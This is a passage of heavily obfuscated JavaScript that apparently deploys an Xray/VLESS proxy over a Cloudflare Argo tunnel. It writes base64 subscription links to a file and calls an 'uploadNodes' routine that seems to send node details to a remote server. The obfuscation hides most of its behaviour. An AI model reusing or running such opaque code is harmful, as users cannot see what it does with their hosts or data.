_0x115a3c(_0x1b76ce-_0x4b071d._0x2d2182,_0x56a041,_0x1b19df-_0x4b071d._0x51891d,_0x1b19df-_0x4b071d._0x26fed5);}return _0x1d77aa[_0x4a3247(_0x24b1cf._0xd57293,0x277,0x325,0x420)](_0x4a1b71,_0x24d9c2);}};function _0x56739f(_0x454b31,_0x58c035,_0x191ba4,_0x4e7372){return _0x3b4340(_0x454b31-_0x370421._0xc923a4,_0x58c035-_0x370421._0x346b93,_0x4e7372,_0x191ba4-0x253);}function _0x115a3c(_0x5c31c4,_0x2304f5,_0x56fa48,_0x4a201a){return _0x47bf34(_0x4a201a- -0x369,_0x2304f5,_0x56fa48-_0x171481._0x29a13d,_0x4a201a-0x1f4);}_0x1d77aa[_0x115a3c(-0xd4,_0xad664e._0x3ce8ca,-_0xad664e._0x2e71ec,-_0xad664e._0xb000a)](setTimeout,()=>{const _0x4560f3={_0x43e77d:0xc6,_0x42bf4d:0xd7,_0xd7d00f:0x3f5},_0x200f8f={_0x242c8a:0x77};function _0x3dd117(_0x42642d,_0x55a903,_0x457421,_0x285109){return _0x56739f(_0x42642d-0x7f,_0x55a903-_0x200f8f._0x242c8a,_0x55a903-0x220,_0x42642d);}function _0xa5f9fe(_0x2df452,_0x485f04,_0x9c9685,_0x105030){return _0x115a3c(_0x2df452-_0x4560f3._0x43e77d,_0x2df452,_0x9c9685-_0x4560f3._0x42bf4d,_0x105030-_0x4560f3._0xd7d00f);}if(_0x560ac2['NHceK'](_0x560ac2['WXMix'],_0x560ac2[_0x3dd117(_0x551c41._0x22e9cc,0x5c9,_0x551c41._0x93d621,_0x551c41._0x1ac69e)])){const _0x4f63e0={};_0x4f63e0['v']='2',_0x4f63e0['ps']=''+_0x277805,_0x4f63e0[_0xa5f9fe(_0x551c41._0x2cfe0e,_0x551c41._0x36d685,_0x551c41._0x15fbf3,_0x551c41._0x249aac)]=CFIP,_0x4f63e0['port']=CFPORT,_0x4f63e0['id']=UUID,_0x4f63e0[_0xa5f9fe(_0x551c41._0x418202,0x187,0x261,_0x551c41._0x6a7341)]='0',_0x4f63e0[_0xa5f9fe(_0x551c41._0x3be5bb,0x210,_0x551c41._0x74f3b2,_0x551c41._0x2502b3)]=_0xa5f9fe(_0x551c41._0x3d0ec8,_0x551c41._0x31bdc7,_0x551c41._0x4e1511,_0x551c41._0x14dd7c),_0x4f63e0[_0xa5f9fe(0x199,_0x551c41._0x273e63,_0x551c41._0x390d36,_0x551c41._0x1fc060)]='ws',_0x4f63e0[_0xa5f9fe(_0x551c41._0x57d7b7,_0x551c41._0x2d801e,_0x551c41._0x2350e4,_0x551c41._0x12adce)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x4c4b3f,_0x551c41._0x34d07c,_0x551c41._0x4205d7,_0x551c41._0x493ed4)],_0x4f63e0[_0xa5f9fe(_0x551c41._0x201e50,0x20f,0x277,_0x551c41._0xe2adfd)]=_0x5ef486,_0x4f63e0[_0x3dd117(_0x551c41._0x48c502,_0x551c41._0x3421e2,_0x551c41._0x437713,0x429)]=_0x560ac2[_0x3dd117(_0x551c41._0x511b18,_0x551c41._0x55cbcf,_0x551c41._0x7dec55,_0x551c41._0x216d4c)],_0x4f63e0[_0x3dd117(0x50b,_0x551c41._0x73bcea,_0x551c41._0x87bf2e,_0x551c41._0x428fdb)]=_0xa5f9fe(_0x551c41._0x54c9a0,_0x551c41._0x544941,0x1a6,_0x551c41._0x170b5e),_0x4f63e0[_0x3dd117(0x55d,_0x551c41._0x3cd133,_0x551c41._0x5b6cd8,_0x551c41._0x56f58e)]=_0x5ef486,_0x4f63e0[_0x3dd117(_0x551c41._0x100b3a,_0x551c41._0x1a3740,0x65d,_0x551c41._0x4c4926)]='',_0x4f63e0['fp']=_0x560ac2[_0xa5f9fe(_0x551c41._0x4b932f,_0x551c41._0x1e136f,_0x551c41._0x534472,_0x551c41._0x104800)];const _0x2c53aa=_0x4f63e0,_0x52d5d5=_0xa5f9fe(0x268,_0x551c41._0x4cb387,_0x551c41._0x4f3440,_0x551c41._0x312fd8)+UUID+'@'+CFIP+':'+CFPORT+'?encryption=none&security=tls&sni='+_0x5ef486+_0x3dd117(0x337,_0x551c41._0x3c4f35,_0x551c41._0x11d3d4,0x339)+_0x5ef486+'&path=%2Fvless-argo%3Fed%3D2560#'+_0x277805+_0x3dd117(_0x551c41._0x5818ed,0x4ed,_0x551c41._0x3ab734,_0x551c41._0x198066)+Buffer[_0x3dd117(_0x551c41._0x463210,0x5b5,_0x551c41._0x4de653,0x4af)](JSON[_0x3dd117(0x2f5,_0x551c41._0x1a3bd4,_0x551c41._0x753173,_0x551c41._0x3d2bbb)](_0x2c53aa))[_0xa5f9fe(0x255,0x1db,_0x551c41._0x4b66e5,_0x551c41._0x1fe979)](_0x3dd117(_0x551c41._0x4f12d0,0x4c6,_0x551c41._0x3ba960,_0x551c41._0x33bdd9))+_0xa5f9fe(_0x551c41._0x4a86da,_0x551c41._0x23801a,_0x551c41._0x281a9b,0x22f)+UUID+'@'+CFIP+':'+CFPORT+_0xa5f9fe(0x2dd,0x3c1,0x3ee,_0x551c41._0x5582b3)+_0x5ef486+_0xa5f9fe(_0x551c41._0xd2b5dd,_0x551c41._0x1fd854,_0x551c41._0xe23e57,0x1aa)+_0x5ef486+_0x3dd117(_0x551c41._0x5b4ed3,0x597,0x61d,0x508)+_0x277805+_0xa5f9fe(_0x551c41._0x40342b,_0x551c41._0x1b553a,_0x551c41._0x5f24e5,0x294);console[_0xa5f9fe(0x1a3,_0x551c41._0x474f17,_0x551c41._0x33dc6e,_0x551c41._0x1f2f2f)](Buffer[_0xa5f9fe(_0x551c41._0x56d56f,_0x551c41._0xe5abef,_0x551c41._0x24d4b1,_0x551c41._0xf0cac9)](_0x52d5d5)[_0xa5f9fe(_0x551c41._0x1eaedd,_0x551c41._0x449dca,_0x551c41._0x9cd810,_0x551c41._0x1fe979)](_0xa5f9fe(0x347,_0x551c41._0x35e9c8,_0x551c41._0x1f50eb,_0x551c41._0x421221))),fs[_0xa5f9fe(_0x551c41._0x32c773,0x302,_0x551c41._0x3fa7b8,_0x551c41._0x323b25)](subPath,Buffer[_0x3dd117(0x691,_0x551c41._0x5290df,_0x551c41._0x1a1c1e,_0x551c41._0x59aa6e)](_0x52d5d5)['toString'](_0x560ac2[_0xa5f9fe(0x3a1,_0x551c41._0x228b54,_0x551c41._0x43f8a0,_0x551c41._0x187e9b)])),console[_0xa5f9fe(_0x551c41._0x108128,_0x551c41._0x59fbc4,_0x551c41._0x1c8739,0x155)](FILE_PATH+_0x3dd117(_0x551c41._0x40ee3b,_0x551c41._0x1c0d8a,0x49e,_0x551c41._0x3a05d5)),subContent=Buffer['from'](_0x52d5d5)[_0xa5f9fe(_0x551c41._0x455aed,_0x551c41._0x13b166,_0x551c41._0x352558,_0x551c41._0x1fe979)](_0xa5f9fe(_0x551c41._0x5869f1,0x1e1,_0x551c41._0x5060ea,_0x551c41._0x421221)),_0x560ac2[_0x3dd117(_0x551c41._0x2972af,_0x551c41._0x2f5b68,_0x551c41._0x26c5b4,_0x551c41._0x3b7f3f)](uploadNodes),_0x560ac2[_0xa5f9fe(_0x551c41._0x6843e,0x262,_0x551c41._0x9df40,0x2fe)](_0x2d10da,_0x52d5d5);}else{const _0x1a655b={};_0x1a655b['access']=_0x560ac2[_0xa5f9fe(_0x551c41._0x142bc4,0xdc,_0x551c41._0x2bb916,_0x551c41._0x165b97)],_0x1a655b[_0xa5f9fe(_0x551c41._0x4296af,_0x551c41._0x2e3fd9,0x2ef,_0x551c41._0x3d6757)]=_0x3dd117(0x466,_0x551c41._0x4404ec,_0x551c41._0x3c5efe,_0x551c41._0x3c7b89),_0x1a655b[_0xa5f9fe(_0x551c41._0x10f73f,_0x551c41._0x483258,_0x551c41._0x3d01c1,_0x551c41._0x1a0aca)]=_0x560ac2[_0x3dd117(_0x551c41._0x120af4,_0x551c41._0xc5731c,_0x551c41._0x1c25c8,0x471)];const _0x20f500={};_0x20f500['dest']=0xbb9;const _0x314a62={};_0x314a62[_0x3dd117(0x56f,_0x551c41._0x9f49f1,_0x551c41._0x23d508,_0x551c41._0x4a5896)]='/vless-argo',_0x314a62['dest']=0xbba;const _0x2f5b6d={};_0x2f5b6d['port']=_0x5aed34,_0x2f5b6d[_0xa5f9fe(_0x551c41._0x4f08a5,_0x551c41._0x2cec24,_0x551c41._0x13b845,_0x551c41._0xf8cf13)]=_0x560ac2[_0xa5f9fe(_0x551c41._0xecfb85,_0x551c41._0x131e5b,_0x551c41._0x503a89,0x18f)],_0x2f5b6d[_0xa5f9fe(_0x551c41._0x1d24d0,_0x551c41._0xda6f7d,_0x551c41._0x2bb06e,_0x551c41._0x52dcb5)]={},_0x2f5b6d[_0x3dd117(_0x551c41._0x3347f8,_0x551c41._0x24170c,_0x551c41._0x2c76cf,_0x551c41._0x9ddfd7)]={},_0x2f5b6d[_0xa5f9fe(_0x551c41._0x1d24d0,_0x551c41._0xda6f7d,_0x551c41._0x2bb06e,_0x551c41._0x52dcb5)][_0xa5f9fe(_0x551c41._0x401e33,_0x551c41._0x442540,_0x551c41._0x2216b9,_0x551c41._0x394caa)]=[{'id':_0x90b2ff,'flow':_0x560ac2[_0x3dd117(0x542,_0x551c41._0x5502fd,_0x551c41._0x1322e3,_0x551c41._0x58480a)]}],_0x2f5b6d[_0xa5f9fe(_0x551c41._0x1d24d0,_0x551c41._0xda6f7d,_0x551c41._0x2bb06e,_0x551c41._0x52dcb5)][_0xa5f9fe(_0x551c41._0x56993b,_0x551c41._0x1419fe,_0x551c41._0x1d7590,_0x551c41._0x59a14e)]=_0x560ac2[_0xa5f9fe(0x15b,_0x551c41._0x23801a,_0x551c41._0x5839d1,_0x551c41._0x40be15)],_0x2f5b6d[_0xa5f9fe(_0x551c41._0x1d24d0,_0x551c41._0xda6f7d,_0x551c41._0x2bb06e,_0x551c41._0x52dcb5)][_0xa5f9fe(0x253,_0x551c41._0xd4664c,0x1f7,_0x551c41._0x501393)]=[_0x20f500,_0x314a62,{'path':_0x560ac2[_0x3dd117(_0x551c41._0xe1bcdd,_0x551c41._0x5232b3,_0x551c41._0x1910d1,_0x551c41._0x48b356)],'dest':0xbbb},{'path':_0x560ac2[_0x3dd117(_0x551c41._0x34e913,_0x551c41._0x16e82f,_0x551c41._0x51fec0,_0x551c41._0x16a7c0)],'dest':0xbbc}],_0x2f5b6d[_0x3dd117(_0x551c41._0x3347f8,_0x551c41._0x24170c,_0x551c41._0x2c76cf,_0x551c41._0x9ddfd7)][_0x3dd117(_0x551c41._0x469dfd,_0x551c41._0x56f58e,_0x551c41._0x1e6e65,_0x551c41._0x1d9a95)]=_0x560ac2['WMUIx'];const _0x3a2507={};_0x3a2507['id']=_0x5b8593;const _0x262704={};_0x262704[_0x3dd117(_0x551c41._0x39130f,_0x551c41._0x2bf072,_0x551c41._0x2cde15,_0x551c41._0x5d2116)]=[_0x3a2507],_0x262704[_0x3dd117(_0x551c41._0x5e2c6e,0x5d6,_0x551c41._0x14978d,_0x551c41._0x1a12e5)]='none';const _0x90fb13={};_0x90fb13['port']=0xbb9,_0x90fb13[_0x3dd117(_0x551c41._0x451946,0x586,0x5c7,0x5a1)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x291aa5,_0x551c41._0xe2adfd,0x242,_0x551c41._0x10f73f)],_0x90fb13[_0x3dd117(_0x551c41._0x80d488,_0x551c41._0x7f28de,_0x551c41._0x5cdff0,0x694)]=_0x560ac2[_0x3dd117(_0x551c41._0x465233,0x434,0x4dc,0x47d)],_0x90fb13[_0x3dd117(_0x551c41._0x51afc6,_0x551c41._0x4d550c,_0x551c41._0x18f728,_0x551c41._0x4a6c8d)]=_0x262704,_0x90fb13[_0xa5f9fe(_0x551c41._0x4107d2,_0x551c41._0xefabb,_0x551c41._0x27169a,_0x551c41._0x360e54)]={},_0x90fb13[_0xa5f9fe(_0x551c41._0x4107d2,_0x551c41._0xefabb,_0x551c41._0x27169a,_0x551c41._0x360e54)][_0xa5f9fe(_0x551c41._0x2a63c6,_0x551c41._0x31b7e6,_0x551c41._0x54eb47,0x15b)]=_0x560ac2['WMUIx'],_0x90fb13[_0xa5f9fe(_0x551c41._0x4107d2,_0x551c41._0xefabb,_0x551c41._0x27169a,_0x551c41._0x360e54)]['security']=_0x560ac2[_0xa5f9fe(_0x551c41._0x228224,_0x551c41._0x351ce8,_0x551c41._0x10821c,_0x551c41._0x4bfbda)];const _0x3b33ce={};_0x3b33ce['id']=_0x297680,_0x3b33ce[_0xa5f9fe(_0x551c41._0x5427a7,_0x551c41._0x3be5bb,_0x551c41._0x410f4c,0x213)]=0x0;const _0x8352c6={};_0x8352c6[_0x3dd117(_0x551c41._0x56b8e9,_0x551c41._0x2bf072,_0x551c41._0x5935e4,0x5fb)]=[_0x3b33ce],_0x8352c6['decryption']=_0x560ac2[_0x3dd117(_0x551c41._0x13b076,_0x551c41._0x3860c4,_0x551c41._0x463210,_0x551c41._0x1c0d8a)];const _0x1b11bf={};_0x1b11bf['path']=_0x560ac2[_0xa5f9fe(_0x551c41._0x5b69c1,0x352,0x3a8,0x38c)];const _0x9a5b03={};_0x9a5b03['network']='ws',_0x9a5b03['security']=_0x3dd117(_0x551c41._0x15b3e0,_0x551c41._0x4cc76f,0x3d1,_0x551c41._0x37691e),_0x9a5b03[_0x3dd117(_0x551c41._0x1e985b,0x5fe,_0x551c41._0x1f7812,_0x551c41._0x2966ec)]=_0x1b11bf;const _0x4c45b9={};_0x4c45b9[_0xa5f9fe(_0x551c41._0x230036,_0x551c41._0x357bf6,_0x551c41._0x45c54a,_0x551c41._0x3195a1)]=!![],_0x4c45b9[_0x3dd117(_0x551c41._0x16b957,_0x551c41._0x1f3aec,_0x551c41._0x23f11f,_0x551c41._0x12a276)]=[_0x560ac2[_0x3dd117(0x6c1,_0x551c41._0x340d2b,_0x551c41._0x38c0f5,_0x551c41._0x508bec)],_0x560ac2[_0xa5f9fe(_0x551c41._0x5547f2,_0x551c41._0x2e1280,_0x551c41._0x3e15cd,_0x551c41._0x5e35fe)],_0x560ac2[_0x3dd117(0x48c,_0x551c41._0x203f6d,_0x551c41._0x562318,_0x551c41._0x143612)]],_0x4c45b9['metadataOnly']=![];const _0x57f937={};_0x57f937['port']=0xbba,_0x57f937[_0xa5f9fe(_0x551c41._0x193f89,_0x551c41._0x49af95,_0x551c41._0x1e637d,0x2e1)]=_0x3dd117(_0x551c41._0xde0fff,_0x551c41._0x99a304,0x516,_0x551c41._0x2b093c),_0x57f937[_0xa5f9fe(0x31c,_0x551c41._0x551a0c,_0x551c41._0x1ed67f,_0x551c41._0x529a1f)]='vless',_0x57f937[_0x3dd117(_0x551c41._0x18f4e5,_0x551c41._0xfc731f,_0x551c41._0x5f11a6,_0x551c41._0x269382)]=_0x8352c6,_0x57f937[_0xa5f9fe(_0x551c41._0x3c13fe,_0x551c41._0x3fc3c4,_0x551c41._0x4e786e,_0x551c41._0x360e54)]=_0x9a5b03,_0x57f937[_0xa5f9fe(_0x551c41._0x5cf22f,0x1d1,_0x551c41._0x15f26a,_0x551c41._0x1d76a5)]=_0x4c45b9;const _0x1b74f5={};_0x1b74f5['id']=_0x2c6039,_0x1b74f5[_0x3dd117(0x524,_0x551c41._0x580de6,_0x551c41._0x297047,_0x551c41._0x24ee5a)]=0x0;const _0xac5e47={};_0xac5e47[_0x3dd117(_0x551c41._0x2ea8bc,_0x551c41._0x2bf072,_0x551c41._0x1c8b70,0x601)]=[_0x1b74f5];const _0x5b4564={};_0x5b4564[_0xa5f9fe(_0x551c41._0x76d2ca,_0x551c41._0x41367d,_0x551c41._0x5b5c40,_0x551c41._0x1fb185)]=0xbbb,_0x5b4564[_0x3dd117(_0x551c41._0x156dc0,_0x551c41._0x5c5bb5,_0x551c41._0x1152ed,_0x551c41._0x21d412)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x6ecfb2,_0x551c41._0x38addd,_0x551c41._0x175821,_0x551c41._0x10f73f)],_0x5b4564[_0x3dd117(_0x551c41._0x6964fd,_0x551c41._0x7f28de,0x701,0x60d)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x488f57,_0x551c41._0x1c16a5,_0x551c41._0x54a5e6,0x2a1)],_0x5b4564[_0xa5f9fe(_0x551c41._0x548544,_0x551c41._0x53b8cf,_0x551c41._0x58c369,_0x551c41._0x521103)]=_0xac5e47,_0x5b4564[_0xa5f9fe(_0x551c41._0x43f1be,_0x551c41._0x5487a3,_0x551c41._0x37d93e,_0x551c41._0x1ad0b1)]={},_0x5b4564[_0x3dd117(_0x551c41._0xab449d,_0x551c41._0x251194,_0x551c41._0x4b2f52,_0x551c41._0x3a6df4)]={},_0x5b4564[_0xa5f9fe(_0x551c41._0x43f1be,_0x551c41._0x5487a3,_0x551c41._0x37d93e,_0x551c41._0x1ad0b1)][_0xa5f9fe(_0x551c41._0x4d381a,_0x551c41._0x800334,0x26b,_0x551c41._0xb9faa1)]='ws',_0x5b4564[_0xa5f9fe(_0x551c41._0x43f1be,_0x551c41._0x5487a3,_0x551c41._0x37d93e,_0x551c41._0x1ad0b1)][_0x3dd117(0x60f,_0x551c41._0x4cab1f,_0x551c41._0x2ee39c,_0x551c41._0x17c949)]={},_0x5b4564[_0xa5f9fe(_0x551c41._0x43f1be,_0x551c41._0x5487a3,_0x551c41._0x37d93e,_0x551c41._0x1ad0b1)][_0x3dd117(0x60f,_0x551c41._0x4cab1f,_0x551c41._0x2ee39c,_0x551c41._0x17c949)][_0x3dd117(0x50e,0x51e,0x617,_0x551c41._0x1e0848)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x4ae810,_0x551c41._0x590a25,_0x551c41._0x5dcd1f,_0x551c41._0x553b59)],_0x5b4564[_0x3dd117(_0x551c41._0xab449d,_0x551c41._0x251194,_0x551c41._0x4b2f52,_0x551c41._0x3a6df4)]['enabled']=!![],_0x5b4564[_0x3dd117(_0x551c41._0xab449d,_0x551c41._0x251194,_0x551c41._0x4b2f52,_0x551c41._0x3a6df4)][_0xa5f9fe(_0x551c41._0x153ce6,_0x551c41._0x474f17,_0x551c41._0x15d425,_0x551c41._0x406dcf)]=[_0x560ac2[_0x3dd117(_0x551c41._0x20bd00,0x60d,_0x551c41._0x2f5928,_0x551c41._0xf8694f)],_0x560ac2['zdOtz'],'quic'],_0x5b4564[_0x3dd117(_0x551c41._0xab449d,_0x551c41._0x251194,_0x551c41._0x4b2f52,_0x551c41._0x3a6df4)]['metadataOnly']=![];const _0x15719a={};_0x15719a[_0x3dd117(_0x551c41._0x5b7deb,_0x551c41._0x14978d,0x4ed,_0x551c41._0x17c949)]=_0x5eb61c;const _0x2c2db0={};_0x2c2db0['clients']=[_0x15719a];const _0x5d6e08={};_0x5d6e08['port']=0xbbc,_0x5d6e08['listen']=_0x560ac2[_0xa5f9fe(_0x551c41._0x149407,_0x551c41._0x4d9371,_0x551c41._0x390d36,_0x551c41._0x10f73f)],_0x5d6e08['protocol']=_0x560ac2[_0xa5f9fe(_0x551c41._0x324a58,_0x551c41._0x1150ad,_0x551c41._0x49b772,_0x551c41._0xe2f89b)],_0x5d6e08['settings']=_0x2c2db0,_0x5d6e08[_0x3dd117(_0x551c41._0x58c963,_0x551c41._0x24170c,_0x551c41._0xdf7640,_0x551c41._0x2b10b4)]={},_0x5d6e08[_0x3dd117(_0x551c41._0x5b76f9,_0x551c41._0xa3527a,_0x551c41._0x3eb0da,_0x551c41._0x143612)]={},_0x5d6e08[_0x3dd117(_0x551c41._0x58c963,_0x551c41._0x24170c,_0x551c41._0xdf7640,_0x551c41._0x2b10b4)]['network']='ws',_0x5d6e08[_0x3dd117(_0x551c41._0x58c963,_0x551c41._0x24170c,_0x551c41._0xdf7640,_0x551c41._0x2b10b4)][_0x3dd117(_0x551c41._0x4c0e31,0x5d9,_0x551c41._0x449f6c,0x4cf)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x240241,_0x551c41._0x146c56,_0x551c41._0x10f2e1,_0x551c41._0x18d616)],_0x5d6e08[_0x3dd117(_0x551c41._0x58c963,_0x551c41._0x24170c,_0x551c41._0xdf7640,_0x551c41._0x2b10b4)][_0x3dd117(_0x551c41._0x25bc55,_0x551c41._0x4a09b5,_0x551c41._0x24bafd,_0x551c41._0x46e93e)]={},_0x5d6e08[_0x3dd117(_0x551c41._0x58c963,_0x551c41._0x24170c,_0x551c41._0xdf7640,_0x551c41._0x2b10b4)][_0x3dd117(_0x551c41._0x25bc55,_0x551c41._0x4a09b5,_0x551c41._0x24bafd,_0x551c41._0x46e93e)][_0x3dd117(_0x551c41._0x57bd17,0x51e,_0x551c41._0x1c24ce,_0x551c41._0x2e169a)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x1bfd99,_0x551c41._0x2a8b56,_0x551c41._0x469ac,_0x551c41._0x50a22a)],_0x5d6e08[_0x3dd117(_0x551c41._0x5b76f9,_0x551c41._0xa3527a,_0x551c41._0x3eb0da,_0x551c41._0x143612)]['enabled']=!![],_0x5d6e08[_0x3dd117(_0x551c41._0x5b76f9,_0x551c41._0xa3527a,_0x551c41._0x3eb0da,_0x551c41._0x143612)][_0xa5f9fe(_0x551c41._0x1dda2c,0x9a,_0x551c41._0x15f26a,0x1bf)]=[_0x560ac2[_0x3dd117(_0x551c41._0xb49785,_0x551c41._0x340d2b,_0x551c41._0x457ea4,0x72f)],_0x560ac2[_0xa5f9fe(_0x551c41._0x5060ea,_0x551c41._0x3584d3,0x163,_0x551c41._0x3d4729)],_0x560ac2[_0xa5f9fe(_0x551c41._0x143865,_0x551c41._0x3cc380,_0x551c41._0x469a34,0x1f7)]],_0x5d6e08[_0x3dd117(_0x551c41._0x5b76f9,_0x551c41._0xa3527a,_0x551c41._0x3eb0da,_0x551c41._0x143612)][_0x3dd117(_0x551c41._0x43279a,_0x551c41._0x81071,0x4c5,_0x551c41._0x3ca643)]=![];const _0x5ec7ad={};_0x5ec7ad[_0xa5f9fe(_0x551c41._0x5247f5,0x20b,0x2a3,_0x551c41._0xdb3f29)]=[_0x560ac2[_0x3dd117(_0x551c41._0x551a0c,_0x551c41._0x4c57a6,_0x551c41._0x5d4931,_0x551c41._0x5a0b13)]];const _0x4332e2={};_0x4332e2['protocol']=_0x560ac2[_0xa5f9fe(0x3b7,_0x551c41._0x2d4cd1,0x402,_0x551c41._0x43a3e2)],_0x4332e2[_0xa5f9fe(_0x551c41._0x146993,_0x551c41._0x728cae,_0x551c41._0x28e891,_0x551c41._0x2e16c3)]=_0x560ac2[_0xa5f9fe(_0x551c41._0x5839d1,0x246,_0x551c41._0x352614,_0x551c41._0x3e1f00)];const _0x311c39={};_0x311c39[_0x3dd117(_0x551c41._0x4146ea,_0x551c41._0x54f63b,_0x551c41._0x2a0f20,_0x551c41._0x5c1cdb)]=_0x560ac2[_0x3dd117(_0x551c41._0x85ebed,_0x551c41._0x3bb10f,_0x551c41._0x4df465,_0x551c41._0x1f3aec)],_0x311c39[_0xa5f9fe(_0x551c41._0x468d59,_0x551c41._0x10f2e1,0x2e7,_0x551c41._0x2e16c3)]='block';const _0x3fbe77={};_0x3fbe77[_0x3dd117(0x363,_0x551c41._0x25c2b0,_0x551c41._0x410fcb,_0x551c41._0x14930b)]=_0x1a655b,_0x3fbe77[_0xa5f9fe(_0x551c41._0x201e50,_0x551c41._0x1e637d,_0x551c41._0x51b9af,_0x551c41._0x3bfc5d)]=[_0x2f5b6d,_0x90fb13,_0x57f937,_0x5b4564,_0x5d6e08],_0x3fbe77[_0x3dd117(_0x551c41._0x2b15f3,_0x551c41._0x515d56,_0x551c41._0x285a1a,0x5b8)]=_0x5ec7ad,_0x3fbe77['outbounds']=[_0x4332e2,_0x311c39];const _0x24a012=_0x3fbe77;_0x2f5a50[_0x3dd117(_0x551c41._0x457ad8,_0x551c41._0x59f281,_0x551c41._0x266d2f,0x54c)](_0x5d178a['join'](_0x3aef04,_0x560ac2[_0xa5f9fe(_0x551c41._0x48766f,_0x551c41._0x54d759,_0x551c41._0x5c4e4a,_0x551c41._0x6ab56b)]),_0x398a9b[_0x3dd117(0x4a5,_0x551c41._0x1fc4ad,_0x551c41._0x1fc4ad,0x44b)](_0x24a012,null,0x19e9+0x1525*-0x1+0xe*-0x57));}},-0x2*0xd88+0x1*-0x1643+0x3923*0x1);});}async function uploadNodes(){const _0x27df08={_0x399ab1:0x1c0,_0x4d1387:0x1ae,_0x4976a6:0x1db,_0x2f54d9:0x1f9,_0x3cb7d1:0x563,_0x1810aa:0x55d,_0x405efe:0x61d,_0x4c2ba5:0xf9,_0x128066:0x293,_0xa6a7b8:0x1d1,_0x5bf810:0x53f,_0x5cfc07:0x587,_0x4ad547:0x53e,_0x17e1a1:0x476,_0x8150d7:0x1ec,_0x3106bc:0x195,_0x3f8405:0x1f3,_0x3bf694:0x192,_0x43ecf9:0x4ec,_0x1147a1:0x4b4,_0x50dabe:0x613,_0x57b860:0x2b0,_0x23b8de:0x344,_0x2702e5:0x2c1,_0x1d64a5:0x372,_0x38fa09:0x53e,_0x2d6722:0x497,_0x3c479d:0x435,_0x14fdf0:0x23c,_0x1cc569:0x3b0,_0x496729:0x29c,_0x54bbb:0x1d5,_0x4c3080:0x345,_0x218668:0x1ef,_0x1ec252:0xc7,_0x1f3944:0x1eb,_0x53e66f:0x5c0,_0x4bf32b:0x50a,_0x26564a:0x577,_0x53dec0:0x2fb,_0x97e90c:0x37f,_0x42e9e5:0x35e,_0x3c72d9:0x398,_0xb7d069:0x42f,_0x2cc8c7:0x31d,_0x1c8984:0x13e,_0x39ceda:0x285,_0x33b922:0x1d5,_0x4f9283:0x2c3,_0xe7595f:0x28e,_0x4583b0:0x494,_0x306dd2:0x4ed,_0x4451fd:0x395,_0x5cd519:0x410,_0x5dfe39:0x34c,_0x3178f2:0x241,_0xd756e:0x22e,_0x2d9ff2:0x184,_0x4f0e3e:0x2a0,_0x4126c6:0x3a5,_0x140791:0x2b9,_0x3ac1c6:0x60e,_0x23511f:0x70a,_0x13e35a:0x70d,_0x31f920:0x71a,_0x327ed0:0x29d,_0x47ca15:0x2be,_0x3d3be9:0x155,_0x2d169f:0x290,_0x34b4e0:0x1d7,_0x25bbd2:0x236,_0x35b869:0xe1,_0x32408:0x1dd,_0x38264a:0x20d,_0x96b024:0x241,_0x1b237c:0x2e7,_0x44aba0:0x4f1,_0x48c874:0x406,_0x35f1e1:0x44e,_0x231935:0x4b3,_0x3c4859:0x54c,_0x87a0ca:0x530,_0x5d2aa8:0x537,_0x3c9976:0x5c5,_0x4bfc8a:0x6c7,_0x5f1181:0x560,_0x33448d:0x337,_0x7190b:0x3d6,_0x4b4742:0x3c3,_0xe55ac:0x1e4,_0x1d3269:0x18e,_0x2e3217:0x22c,_0x5b3c49:0x65b,_0x58471f:0x605,_0x45e5fb:0x5c1,_0x3d867c:0x573,_0x2c1255:0x52e,_0x185f22:0x28f,_0x3be054:0x1b7,_0x4ba708:0x21b,_0x166170:0x175,_0x5ec5b8:0x219,_0xa57d06:0x26b,_0x40d86f:0x4c8,_0xc05eb9:0x57c,_0x50f767:0x46d,_0x269c19:0x37d,_0x4d40c5:0x25d,_0x116b95:0x361,_0x96fad0:0x37f,_0x7f93fd:0x37d,_0x34e936:0x429,_0x370424:0x4d8,_0x379747:0x53e,_0x4a3f6b:0x471,_0x1cbc27:0x432,_0x2ecf27:0x4b2,_0x4374ba:0x3f7,_0x30a131:0x593,_0x20c21c:0x3e2,_0x1d06db:0x1fe,_0x578e46:0x230,_0x4f56f7:0x261,_0x3172d8:0x3fd,_0x35ab14:0x370,_0x5e75c9:0x331,_0x21af94:0x504,_0x1146a1:0x610,_0x498f98:0x56f,_0x4bf3cf:0x565,_0x5bad17:0x4f6,_0x1b9ac3:0x2ba,_0x272aa4:0x2c6,_0x562533:0x473,_0x2ecdc4:0x586,_0x5b129a:0x539,_0x1c8072:0x578,_0x1201ea:0x342,_0x2b6c0a:0x3cb,_0x53eef7:0x323,_0x3d71d3:0x4d8,_0x45dfc9:0x509,_0x4718a2:0x402,_0x3ccdf6:0x575,_0x3481be:0x1f9,_0x52d910:0x23e,_0x5c74b6:0x225,_0x223b7d:0x572,_0x2de39a:0x5ca,_0x2d5de1:0x56e,_0x2a97d5:0x508,_0x26fcb6:0x1c6,_0x332c9c:0x3b3,_0x43a50f:0x594,_0x2da4e0:0x43c,_0x1859c3:0x227,_0x106845:0x3d6,_0x591e2a:0x337,_0x2c50c8:0x2a2,_0x519831:0x23f,_0x148f5b:0x42e,_0x22702b:0x5e2,_0x4dffbd:0x3f3,_0xc5b49:0x2b1,_0x465c40:0x3b6,_0x19f5c7:0x309,_0x40e5e6:0x159,_0x848ebc:0x15b,_0x3e1ecb:0x67a,_0x104ef1:0x644,_0x5698e6:0x6b0,_0x178849:0x794,_0x2a3d8e:0x5c6,_0x309ca7:0x4d4,_0x2a4c52:0x5c9,_0x128928:0x4d7,_0x290b5b:0x465,_0x268a46:0x3d5,_0x3a2719:0x505,_0xda306d:0x5cf,_0x47acad:0x575,_0x1d1682:0x5ba,_0x4827e0:0x2db,_0x38c9f0:0x221,_0x417353:0x3a3,_0x399ad1:0x316,_0xd3cbce:0x649,_0x404f92:0x559,_0x5cee08:0x525,_0x3a762b:0x745,_0x19a52f:0x41a,_0x247ff1:0x341,_0x86496:0x35e,_0x177acb:0x306,_0x41fa28:0x2b9,_0x1e5f06:0x47c,_0x3fd1f3:0x446,_0x3908f0:0x4c0,_0x88c85d:0x4d9,_0x39bba:0x29e,_0x4f07d1:0x165,_0xb9946d:0x17b,_0x16ee5f:0x51c,_0x296ae4:0x478,_0x192f64:0x4aa,_0x23272d:0x472,_0x3ebf1e:0x401,_0x189a5d:0x36b,_0x4337a